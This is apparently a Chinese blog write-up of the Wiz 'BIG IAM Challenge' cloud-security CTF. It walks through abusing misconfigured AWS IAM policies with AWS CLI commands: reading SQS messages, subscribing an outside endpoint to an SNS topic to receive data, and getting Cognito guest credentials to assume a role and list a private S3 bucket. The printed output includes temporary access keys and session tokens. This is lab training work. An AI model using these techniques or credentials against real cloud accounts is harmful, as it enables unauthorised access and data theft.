记录云安全的第一个靶场

靶场地址: The BIG IAM Challenge

challenge1

1
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": "*", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*" }, { "Effect": "Allow", "Principal": "*", "Action": "s3:ListBucket", "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b", "Condition": { "StringLike": { "s3:prefix": "files/*" } } } ] }

challenge2

提示给的是:

1
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": "*", "Action": [ "sqs:SendMessage", "sqs:ReceiveMessage" ], "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2" } ] }

aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2 查看消息即可
访问url,即可拿到flag

challenge3

是一个订阅,我们选择一个能够外带信息的网站即可,先发个订阅过去,然后回复一条url,点进去确认即可

> aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol https --notification-endpoint yourUrl

challenge5

1
{ "Version": "2012-10-17", "Statement": [ { "Sid": "VisualEditor0", "Effect": "Allow", "Action": [ "mobileanalytics:PutEvents", "cognito-sync:*" ], "Resource": "*" }, { "Sid": "VisualEditor1", "Effect": "Allow", "Action": [ "s3:GetObject", "s3:ListBucket" ], "Resource": [ "arn:aws:s3:::wiz-privatefiles", "arn:aws:s3:::wiz-privatefiles/*" ] } ] }

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
> aws cognito-identity get-id --identity-pool-id 'us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13
da3b'
{
    "IdentityId": "us-east-1:157d6171-eef3-c748-8cda-447ccf1953cb"
}
> aws cognito-identity get-credentials-for-identity --identity-id us-east-1:157d6171-eef3-c7
48-8cda-447ccf1953cb
{
    "IdentityId": "us-east-1:157d6171-eef3-c748-8cda-447ccf1953cb",
    "Credentials": {
        "AccessKeyId": "ASIARK7LBOHXM5KA3RD6",
        "SecretKey": "1Ot5T4CRqTtZyrY7w2Cf88WCMjjON0qyW5DuY/Iq",
        "SessionToken": "IQoJb3JpZ2luX2VjEIP//////////wEaCXVzLWVhc3QtMSJIMEYCIQCHUIYZrfmL+xy
RiwzPvRLZCAivRjN/Pl01Boijac2GhwIhAOY66KwImdGaTpVGJra4GeXRYmARnSP1BFcyZ8U91hY8KrEFCCwQABoMMDk
yMjk3ODUxMzc0Igz9OdTMgLiQIx6VsEsqjgVLP0b7Sa9yrRU6DzEsjsN1PE23gk4lY419AgpomM8QCwMs98zUZg3QFs9
YTXesUbOFLRw7/gT2uEXxEg0ew3lJx32t5Jk0yva/AEZjafarg0oryYaYB22Gbeiaj7gRsbiaOmdnWKlUtl66eZvpTez
DdBHjh1gLlVXuQDUsORVlfkPFesvGc0X2LdPWbQaVwQLq9eJxBptmylGFV2pTuev9YQnTJbXXfNFv4/i8lp2rdg+EHp1
xqmT57aFVGAkV0k9oufIERIz9NNrWravAUC7JPxOxI2lKwcOcJUsi3+Y6xYY3cRnYeso0rpYOK9oG4QWGuwnZm5XTrIz
l7Q3yjGP15z5q0ZdLxWvpupIyopHHTntXVg6AhWO/EB+fuCO/+6AUfj8F8blFkcqcKA++mbJETw+LKVPJaja43+I0UXD
a0RMlMYxHU16mCFLIgS6otdCH7tXpMToZF8w/g7DRo1glCtvLnvWCazcaugwLfzdDnTeWAzR6jYeVZpgjpRU+auGgta0
HlipuP5YBBXY2TaoS3bethzy+yU/CuvklFSYhnuEtVENFO0mIHmVAq3HLl6dkrl8Kj51Mr4tqgG0dzExfOm7eGTEiWV1
Emwt7LNq/IJILJDOu/S39NqdpMP8n6INbbLMFmfJv66KFtebx26Pc/KiBBnb6S6iQOhXncRVWqslR0iJGfWTApsuS6Ee
eWz0euR62bzisjim/N8lBDALseNFtSEamq0VSZaLb8ZHzNvK7caR1oPzTiSYOsEVxihzvnSLjA2UH1Cp2f7f5+2l0Dda
mjTWqpmaW4ua6pFVTh3EkK7Ll+JXcdQ8JKfTYdM5nPussiDazh15/OqIJQmc0YZDhWmbfYBxETZmRYW8w/qriwAY63AJ
nTXRnKEh3woemArKttxYbar+HtIMogRo7BHBzi92Jbas+Ui/+AkNJUBcfl3sSoI6HUq3M9FqlxlRfdW88nswu2DcT+bK
LjdMNKjeZhwhd7u4wvbdtjVjNOg+gIFQ69b8nvBeO9EB3j5mEK7gGiwPAJ7aWinX93YxWLWLPivOxpJIn3+Ab82IY5Rr
XWnWIt4LmZSBiT3+KcjkhY1ZacP5QPDw+8ZMr+n5pgOPC3Qeubjz/C1r5ISywO/I+8ZisaOxMNKEBJkD5PgRcPtEsKfM
INxaOTjONaMiW4avuWRUoGfUx8QC+MAoD052kUHihNulzxbs+fuCd4tqvElzntXKxAhZOewb/hnAxm0Qp6JwuBoDLvQ5
Va+eaxlg6sL1Z5Hbhv2vbueRrQGSe8QfDV4oL5e66Wek4ljikksBTWf39RFxK1wz1QpVJauqEpvv1KCDuYXUit/AFbXa
oKLU=",
        "Expiration": 1746445198.0
    }
}> aws cognito-identity get-id --identity-pool-id 'us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b'> aws cognito-identity get-credentials-for-identity --identity-id us-east-1:157d6171-eef3-c748-8cda-447ccf1953cb



❯ aws configure set aws_access_key_id ASIARK7LBOHXM5KA3RD6
❯ aws configure set aws_secret_access_key 1Ot5T4CRqTtZyrY7w2Cf88WCMjjON0qyW5DuY/Iq
❯ aws configure set aws_session_token IQoJb3JpZ2luX2VjEIP//////////wEaCXVzLWVhc3QtMSJIMEYCIQCHUIYZrfmL+xyRiwzPvRLZCAivRjN/Pl01Boijac2GhwIhAOY66KwImdGaTpVGJra4GeXRYmARnSP1BFcyZ8U91hY8KrEFCCwQABoMMDkyMjk3ODUxMzc0Igz9OdTMgLiQIx6VsEsqjgVLP0b7Sa9yrRU6DzEsjsN1PE23gk4lY419AgpomM8QCwMs98zUZg3QFs9YTXesUbOFLRw7/gT2uEXxEg0ew3lJx32t5Jk0yva/AEZjafarg0oryYaYB22Gbeiaj7gRsbiaOmdnWKlUtl66eZvpTezDdBHjh1gLlVXuQDUsORVlfkPFesvGc0X2LdPWbQaVwQLq9eJxBptmylGFV2pTuev9YQnTJbXXfNFv4/i8lp2rdg+EHp1xqmT57aFVGAkV0k9oufIERIz9NNrWravAUC7JPxOxI2lKwcOcJUsi3+Y6xYY3cRnYeso0rpYOK9oG4QWGuwnZm5XTrIzl7Q3yjGP15z5q0ZdLxWvpupIyopHHTntXVg6AhWO/EB+fuCO/+6AUfj8F8blFkcqcKA++mbJETw+LKVPJaja43+I0UXDa0RMlMYxHU16mCFLIgS6otdCH7tXpMToZF8w/g7DRo1glCtvLnvWCazcaugwLfzdDnTeWAzR6jYeVZpgjpRU+auGgta0HlipuP5YBBXY2TaoS3bethzy+yU/CuvklFSYhnuEtVENFO0mIHmVAq3HLl6dkrl8Kj51Mr4tqgG0dzExfOm7eGTEiWV1Emwt7LNq/IJILJDOu/S39NqdpMP8n6INbbLMFmfJv66KFtebx26Pc/KiBBnb6S6iQOhXncRVWqslR0iJGfWTApsuS6EeeWz0euR62bzisjim/N8lBDALseNFtSEamq0VSZaLb8ZHzNvK7caR1oPzTiSYOsEVxihzvnSLjA2UH1Cp2f7f5+2l0DdamjTWqpmaW4ua6pFVTh3EkK7Ll+JXcdQ8JKfTYdM5nPussiDazh15/OqIJQmc0YZDhWmbfYBxETZmRYW8w/qriwAY63AJnTXRnKEh3woemArKttxYbar+HtIMogRo7BHBzi92Jbas+Ui/+AkNJUBcfl3sSoI6HUq3M9FqlxlRfdW88nswu2DcT+bKLjdMNKjeZhwhd7u4wvbdtjVjNOg+gIFQ69b8nvBeO9EB3j5mEK7gGiwPAJ7aWinX93YxWLWLPivOxpJIn3+Ab82IY5RrXWnWIt4LmZSBiT3+KcjkhY1ZacP5QPDw+8ZMr+n5pgOPC3Qeubjz/C1r5ISywO/I+8ZisaOxMNKEBJkD5PgRcPtEsKfMINxaOTjONaMiW4avuWRUoGfUx8QC+MAoD052kUHihNulzxbs+fuCd4tqvElzntXKxAhZOewb/hnAxm0Qp6JwuBoDLvQ5Va+eaxlg6sL1Z5Hbhv2vbueRrQGSe8QfDV4oL5e66Wek4ljikksBTWf39RFxK1wz1QpVJauqEpvv1KCDuYXUit/AFbXaoKLU=
❯ aws sts get-caller-identity
❯ aws s3 ls s3://wiz-privatefiles


记得走代理访问,那个靶场自带的cli用不了好像,无法更改,建议本地下个aws cli

challenge6

1
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "Federated": "cognito-identity.amazonaws.com" }, "Action": "sts:AssumeRoleWithWebIdentity", "Condition": { "StringEquals": { "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b" } } } ] }
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
{
    "IdentityId": "us-east-1:157d6171-eeb8-c7de-a1ea-32bd37977adb"
}

aws cognito-identity get-open-id-token --identity-id us-east-1:157d6171-eeb8-c7de-a1ea-32bd37977adb
{
    "IdentityId": "us-east-1:157d6171-eeb8-c7de-a1ea-32bd37977adb",
    "Token": "eyJraWQiOiJ1cy1lYXN0LTEtNyIsInR5cCI6IkpXUyIsImFsZyI6IlJTNTEyIn0.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWViOC1jN2RlLWExZWEtMzJiZDM3OTc3YWRiIiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3NDY0NTE3MTUsImlhdCI6MTc0NjQ1MTExNX0.mWJvW8e652WhH9PrHRFqBqPgfxwiGT-K94nMwkXzGnvNQnKC8z6yXVadZqHrytPjRSoyqSyo6kakinSb7Te0BddfIqHFGHJJuzZP6qbBh2FhvNpA9q2_BhSrHIJcT8aQjKjrbIApXoEdlXX4pQnM97HFd54zIQxVfWWPvUE184swCW8LtFesXALMZVp6j14Mapp4tIPvk6HSbpXzyfaoay96lwZ23F9-mkv_xllYQxvuiD-8ljUfeTSqCXxBIoBe_NnzVPxCTw8TyzbMDe7yzhGMuDMFrEl2aHvM3iVt8QdbVVuxjC9wOyWeOn8dIdmrNmz3UUj0lGJCU7Be3eIqeg"
}

aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name 11a --web-identity-token eyJraWQiOiJ1cy1lYXN0LTEtNyIsInR5cCI6IkpXUyIsImFsZyI6IlJTNTEyIn0.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWViOC1jN2RlLWExZWEtMzJiZDM3OTc3YWRiIiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3NDY0NTE3MTUsImlhdCI6MTc0NjQ1MTExNX0.mWJvW8e652WhH9PrHRFqBqPgfxwiGT-K94nMwkXzGnvNQnKC8z6yXVadZqHrytPjRSoyqSyo6kakinSb7Te0BddfIqHFGHJJuzZP6qbBh2FhvNpA9q2_BhSrHIJcT8aQjKjrbIApXoEdlXX4pQnM97HFd54zIQxVfWWPvUE184swCW8LtFesXALMZVp6j14Mapp4tIPvk6HSbpXzyfaoay96lwZ23F9-mkv_xllYQxvuiD-8ljUfeTSqCXxBIoBe_NnzVPxCTw8TyzbMDe7yzhGMuDMFrEl2aHvM3iVt8QdbVVuxjC9wOyWeOn8dIdmrNmz3UUj0lGJCU7Be3eIqeg
{
    "Credentials": {
        "AccessKeyId": "ASIARK7LBOHXDSRNDLUP",
        "SecretAccessKey": "fVOOJB89RtKfaMR1SLUNtH08ZcdZtWflTTaCx7Pg",
        "SessionToken": "IQoJb3JpZ2luX2VjEIb//////////wEaCXVzLWVhc3QtMSJHMEUCIEAxPd0s3WHlC4FjIYm8Zp/mt/3i4DzwMXaQTtDsC2cDAiEArd4WuJ7d9GVgG3DiKepZ4e4931wDuNfDf4mXt00JlKgqhAMILhAAGgwwOTIyOTc4NTEzNzQiDIfFchM4NH7Ug5RC/CrhAg+B4XB5gZWavPah/MpaTRDSPax+GKHyAjtaeXfO38A/lqsoOCLXymlzQgf1HaNipq+ug+5dfbLyn/dibAfcIyd4hUTDW72PZ7dG+pHmCjVdhKtWtrCr1413IAJ7vMkb6TLj5mKlINXFHx0E3iQsggaS6Lbw+scpsOqB/YkocGjtrpYN53w5XFc8oVvCszCzGnbMjAbXOKbEf0s2yXx9K2Kv+NqXVppJBLIligl8AOzkSAtvMEBQ+GMI/D51bF2rve/a56XlETZaqa5DivdVqJ2+tlgU0Z1n/6HCvVkDEE3wtKSFIu7zppBFO9a6Ptz4F96ZG6H9qKRQsFZpRe5izbcQe3HkR8IA11liksj5ry9jSezHadcnIWCH5kwk4G+EILaYOg9/HtmbrMoLF0e0ALYnjOJpXgm73SdwYwBH7xSXCn3zyLmhnkJBOi1FWErj3pM+dhum+xAFZchv5BLy8PfpMOj24sAGOocCAHL0IEOwkNc5v1Nr/G7+9oSpSe0O1wpujGInRguRxDSAEpXd2V1dN04w3KMOM/1DVrhigGqEkwQfWzzgVt/8WThhB25/lRNUcDg7A9BWUhBG8FrOaecEimA5HX1wuTTq4u9++A0TjedxcPVG0aD5qd3eUxaaDtY7oCQz26nap6kVMx3AjdHCsm9xc+AAehc7sD+nqgWG+FZKfmU7but6gO6j0Fib4lxE0P1zBtGPzIIAo795TGIkay+7ulQ/CnsSC9BDPi77Nm1rLYIO4GQF79cAiLOOCPB9JrqyPmvbx/VSoGseZjK6WRW27LyEUUijGlV5JoOYzsCXh1WFH8vFp60odMTgWYM=",
        "Expiration": "2025-05-05T14:21:44+00:00"
    },
    "SubjectFromWebIdentityToken": "us-east-1:157d6171-eeb8-c7de-a1ea-32bd37977adb",
    "AssumedRoleUser": {
        "AssumedRoleId": "AROARK7LBOHXASFTNOIZG:11a",
        "Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/11a"
    },
    "Provider": "cognito-identity.amazonaws.com",
    "Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}

然后跟前面一关一样配置一下keyid和key和token即可
通过咧,还是对云安全有点迷,继续看下去吧~

补充

也可不用那个方法,启用一个临时文件,然后调用时指定即可
proxychains aws sts get-caller-identity --profile 配置文件